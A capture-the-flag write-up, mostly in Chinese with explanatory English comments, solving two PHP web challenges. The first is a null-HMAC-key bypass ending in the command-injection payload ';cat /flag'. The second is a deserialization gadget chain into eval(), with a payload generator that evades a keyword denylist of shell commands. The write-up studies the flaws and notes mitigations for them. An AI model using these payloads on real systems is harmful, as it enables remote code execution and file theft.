web huluwa 音频末尾有源码
// Challenge handler quoted from the writeup. Both POST fields are mandatory;
// note that empty() also rejects the value "0", not only a missing field.
if (empty($_POST['Huluxiaojinggang']) || empty($_POST['Shejing'])) {
    die('1');
}
// The HMAC key is read from the environment...
$secret = getenv("secret");
// ...but an optional client-supplied 'yeye' re-derives it. hash_hmac() does not
// accept an array for its data argument, so a yeye[]=... request makes this call
// fail and leaves $secret null (the exact failure mode depends on the PHP version),
// i.e. the key becomes client-controlled. Key material must never be a function
// of request data.
if (isset($_POST['yeye'])) $secret = hash_hmac('sha256', $_POST['yeye'], $secret);
$qwer = hash_hmac('sha256', $_POST['Shejing'], $secret);
// The reference MAC is disclosed to the client BEFORE it is verified, which by
// itself defeats the check below. A verifier must never echo the expected value.
echo $qwer . '<br>';
// Plain !== on MAC values; hash_equals() is the constant-time comparison, though
// the disclosure above makes the timing side channel moot here.
if ($qwer !== $_POST['Huluxiaojinggang']) {
    die('2');
}
// Command injection: 'Shejing' is concatenated unescaped into a shell command
// ("nc" . $input, with no separating space). The MAC check does not help because
// the string being MAC'd is the injected string itself. Mitigation: an allow-list
// of permitted values, or at minimum escapeshellarg() on the argument.
echo exec("nc" . $_POST['Shejing']);
利用传入数组使 hash_hmac 报错，从而令 $secret 为 null，然后就可以用同一函数自行计算出 $qwer 的值。
所以最终payload:
1 yeye[]=1&Huluxiaojinggang=c7e4698914f5d06bf59a9b3b081046f261170deb991ca94e9c2ddfafe928560a&Shejing=;cat /flag
php-levels 首先采用php伪协议读取了hint.php文件里面内容
事实上这个能出来纯属巧合,原本能绕过的payload应当是
然后进行base64解码得到了源码
<?php
// Challenge source recovered in the writeup. Every class below defines a magic
// method that PHP invokes implicitly; together they form the gadget chain the
// writeup describes (dog -> ct -> mouse -> get).
error_reporting(0);
class mouse {
    public $rice;
    // Runs on isset($obj->prop) for an inaccessible property. Calls an undefined
    // method on $rice, which reaches get::__call when $rice is a get instance.
    function __isset($n) {
        $this->rice->nothing();
    }
}
class dog {
    public $a;
    public $b;
    public $c;
    // Runs right after unserialize(); resets $a to a harmless string, presumably
    // meant to defuse die($this->a) below.
    function __wakeup() {
        $this->a = 'chance?';
    }
    // Entry point of the chain: runs when the deserialized object is destroyed.
    // If $b is a PHP reference to $a (serialized as R:), this assignment also
    // rewrites $a with $c, so die() string-converts $c instead of 'chance?'.
    function __destruct() {
        $this->b = $this->c;
        die($this->a);
    }
}
class ct {
    public $fish;
    // Reached via string conversion; the isset() on a nested object property
    // triggers mouse::__isset when $fish is a mouse instance.
    function __toString() {
        if (isset($this->fish->d)) {
            echo 'you wrong';
        }
    }
}
class get {
    public $cmd;
    // Runs for any undefined method call. eval() of a public property that the
    // attacker sets through the serialized payload: arbitrary code execution.
    function __call($name, $no) {
        eval($this->cmd);
    }
}
$pop = $_GET['pop'];
// A keyword denylist applied to the serialized text is not an effective control
// (the writeup's payload passes it). unserialize() on untrusted input with these
// classes loaded is the real defect; mitigation is
// unserialize($pop, ['allowed_classes' => false]) or a non-executable format such
// as JSON.
if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|base|echo|cp|\$|\*|\+|\^|scan|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i', $pop)) {
    echo "you will get flag" . '</br>';
    unserialize($pop);
} else {
    die("Try again!");
}
是一个 PHP 反序列化链
从dog->ct->mouse->get
构造payload绕过正则
<?php
// Payload generator from the writeup: the same class names as the challenge,
// with constructors that wire the objects together so that serialize() emits
// the chain dog -> ct -> mouse -> get.
error_reporting(0);
class mouse {
    public $rice;
    function __construct() {
        $this->rice = new get;
    }
}
class dog {
    public $a;
    public $b;
    public $c;
    function __construct() {
        $this->a = 'chance?';
        // $b aliases $a; serialize() records this as a reference (R:), so on the
        // target the __wakeup() reset of $a is undone when __destruct() assigns
        // $c (a ct object) to $b.
        $this->b = &$this->a;
        $this->c = new ct;
    }
}
class ct {
    public $fish;
    function __construct() {
        $this->fish = new mouse;
    }
}
class get {
    public $cmd;
    // Code string consumed by get::__call -> eval() on the target. The backslash
    // inside the word is how the writeup keeps the string out of the challenge's
    // keyword denylist; it shows why a text denylist is not a control.
    function __construct() {
        $this->cmd = 'print(`c\at /realflag/you_want_flag.php`);';
    }
}
$b = new dog;
var_dump(serialize($b));
1 flag{c91d38f0-86ea-4f36-b4d8-5e6a716ea8fe}
另外一种构造是
1 2 $this ->cmd = '?><?=`nl /realflag/you_want_flag.php`;' ;
用 `?><?=` 替代了 echo 的作用（`<?=` 是短回显标签）